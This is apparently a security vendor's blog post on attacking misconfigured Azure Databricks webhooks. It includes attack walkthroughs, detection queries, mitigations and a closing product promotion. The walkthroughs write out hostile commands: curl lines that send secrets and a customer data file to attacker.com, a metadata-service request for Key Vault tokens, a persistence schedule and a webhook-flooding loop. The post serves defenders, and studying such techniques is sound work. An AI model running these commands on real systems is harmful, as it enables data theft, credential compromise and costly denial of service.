Introduction
Azure Databricks is a powerful data analytics and machine learning platform that enables organizations to process large datasets efficiently. One of its key automation features is the use of webhooks, which allow external services to trigger Databricks jobs, workflows, or data pipelines in response to events. Webhooks provide seamless integration with CI/CD pipelines, monitoring tools, and third-party applications.
However, if not configured securely, Databricks webhooks can become a silent backdoor for attackers, allowing them to execute arbitrary code, manipulate data, or even escalate privileges within the environment. Unauthorized webhook access can lead to remote code execution, data exfiltration, and financial losses due to unauthorized compute usage.
This blog explores the security risks associated with Databricks webhooks, how attackers exploit misconfigurations, and best practices for securing webhook-based executions.
What are Databricks Jobs, Notebooks, and Webhooks?
Databricks Jobs
Databricks Jobs automate notebooks, scripts, or SQL queries on a cluster. They are used for ETL, machine learning training, and scheduled workflows, running either manually, on a schedule, or via external triggers.
Databricks Notebooks
Notebooks provide an interactive coding environment for Python, Scala, SQL, and R, used for data exploration, analysis, and visualization. If misconfigured, they can expose sensitive data or allow unauthorized code execution.
Databricks Webhooks
Databricks Webhooks allow external applications and services to trigger jobs or execute notebooks via HTTP requests. They enable seamless integrations with CI/CD pipelines, monitoring tools, and real-time data processing workflows.
A webhook triggering a Databricks job via API might look like this:
When configured securely, webhooks provide automation benefits, but if they lack authentication, are publicly accessible, or have overprivileged execution roles, attackers can exploit them to execute arbitrary code within a Databricks environment. A compromised webhook can lead to remote code execution, unauthorized data access, or service disruptions.
How Databricks Webhooks Work in Practice
A Databricks job webhook is usually set up in the following way:
- A user creates a Databricks job.
- A webhook URL is generated to trigger the job via an HTTP request.
- An external service sends a POST request to the webhook to start the job.
- The job executes the specified notebook, script, or Spark job on a Databricks cluster.
Example of calling a webhook manually:
Attacker Methodology
When Databricks webhooks are misconfigured, they can serve as a silent entry point for attackers to execute arbitrary code, manipulate data, or escalate privileges. A poorly secured webhook—especially one lacking authentication or network restrictions—can be exploited remotely without requiring direct access to the Databricks workspace.
Below, we explore the common misconfigurations that lead to exploitation, the techniques attackers use to discover and abuse vulnerable webhooks, and how these attacks can escalate to more severe security breaches.
Common Misconfigurations Leading to Vulnerabilities
Publicly Accessible Webhooks
If a webhook lacks authentication, attackers can send requests to trigger jobs.
Exposed API Tokens
If webhook URLs or authentication tokens are leaked in logs, repositories, or hardcoded in scripts, attackers can hijack them.
Overprivileged Jobs
Jobs triggered by webhooks often run with high privileges, allowing attackers to access Databricks File System (DBFS), Key Vault, or Azure Storage Accounts.
Lack of IP Restrictions
If IP whitelisting is not enforced, anyone on the internet can trigger webhooks.
How Attackers Exploit Databricks Webhooks
Discovering Vulnerable Webhooks
Attackers use tools like Shodan or search GitHub repositories for exposed webhook URLs.
Triggering Unauthorized Job Executions
If the webhook lacks authentication, attackers send a request to execute a malicious Spark job, potentially leading to privilege escalation.
Executing Malicious Code via Webhook Jobs
Attackers can inject malicious code into a job:
import os
os.system("curl -X POST http://attacker.com --data $(cat /dbfs/secrets.txt)")
This script exfiltrates sensitive data to an attacker-controlled server.
Lateral Movement Using Overprivileged Webhooks
If the webhook job has access to Databricks storage, Key Vault, or Azure resources, attackers can:
List storage contents:
dbutils.fs.ls("dbfs:/mnt/")
Extract Azure Key Vault secrets:
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token"
Attack Walkthrough
Scenario A: Exploiting an Unauthenticated Webhook for Remote Code Execution
Step 1: Discover the Vulnerable Webhook
The attacker scans for exposed Databricks API endpoints and webhooks by searching for hardcoded tokens in public repositories using GitHub search.
Step 2: Invoke the Webhook to Execute Arbitrary Code
The attacker sends a POST request to the webhook, triggering an unauthorized job execution:
curl -X POST https:///api/2.1/jobs/run-now -H "Content-Type: application/json" -d '{"job_id": 1234}'
Step 3: Exploit for Data Exfiltration
The attacker modifies the job to extract sensitive data from the Databricks File System (DBFS):
dbutils.fs.cp("dbfs:/mnt/customer-data.csv", "file:/tmp/exfiltrated.csv")
They then use a simple cURL command to send the file to an external server:
curl -X POST -F "file=@/tmp/exfiltrated.csv" http://attacker.com/upload
Step 4: Maintain Access or Escalate Privileges
The attacker ensures persistence by modifying the Databricks job to execute their payload periodically:
{
"job_id": 1234,
"schedule": {
"quartz_cron_expression": "0 0/5 * * * ?",
"timezone_id": "UTC"
}
}
Scenario B: Using a Webhook to Escalate Privileges and Access Azure Resources
Step 1: Identify a Misconfigured Webhook with Excessive Privileges
The attacker lists available jobs and examines their execution context:
databricks jobs list --output JSON | jq '.jobs[] | {job_id, settings}'
Step 2: Use the Webhook to Invoke a Privileged Job
The attacker triggers a high-privilege job using the compromised webhook:
curl -X POST https:///api/2.1/jobs/run-now -H "Authorization: Bearer " -d '{"job_id": 6789}'
Step 3: Extract Secrets from Key Vault Using Databricks Execution Context
TOKEN=$(curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2019-08-01&resource=https://vault.azure.net" | jq -r .access_token)
Step 4: Use Extracted Secrets to Access Other Azure Resources
Using stolen credentials, the attacker moves laterally to access and modify other resources.
Scenario C: Denial-of-Service (DoS) Attack Using Webhook Flooding
Step 1: Identify a High-Cost Webhook Execution
The attacker targets a job that runs on a powerful cluster, incurring high costs.
Step 2: Flood the Webhook with Repeated Requests
while true; do
curl -X POST https:///api/2.1/jobs/run-now -d '{"job_id": 5678}'
done
Investigating and Uncovering Vulnerabilities
Step 1: Identify Exposed Webhooks
databricks jobs list --output JSON | jq '.jobs[] | {job_id, settings}'
Step 2: Check Audit Logs for Suspicious Executions
AzureDiagnostics
| where Category == "Databricks"
| where OperationName contains "RunSubmit"
| where CallerIPAddress !in ("trusted_IP1", "trusted_IP2")
Step 3: Identify Data Exfiltration Attempts
AzureDiagnostics
| where Category == "Databricks"
| where OperationName == "DbfsCopy"
| where ResourceId contains "mnt"
How to Mitigate
- Enforce Authentication for Webhooks
- Require OAuth tokens or API keys for webhook requests.
- Example: Secure API requests with a bearer token.
- Restrict Webhook Execution Permissions
- Use least privilege access for webhook jobs.
- Avoid running webhook-triggered jobs with Administrator privileges.
- Implement IP Whitelisting
- Restrict webhook access to trusted IP ranges in Azure Firewall.
- Enable Audit Logging for Webhooks
- Monitor who triggers webhooks and from where using Azure Monitor and Databricks audit logs.
Cyngular Security's CIRA Platform
To further secure your cloud environment, consider integrating Cyngular Security's CIRA platform. It enhances your security posture by providing advanced investigation and response capabilities, enabling your team to address threats swiftly and effectively.
Get a Free Breach Assessment
- Safe and Non-disruptive: Conducted with read-only access to ensure no operational disruption.
- Easy Setup: Integrates seamlessly with your existing SIEM systems.
- Deep Insights: Empowers your cybersecurity strategy with advanced threat hunting and proactive investigation capabilities.
Request your free Proof-of-Value today and lead the way in cybersecurity innovation with Cyngular.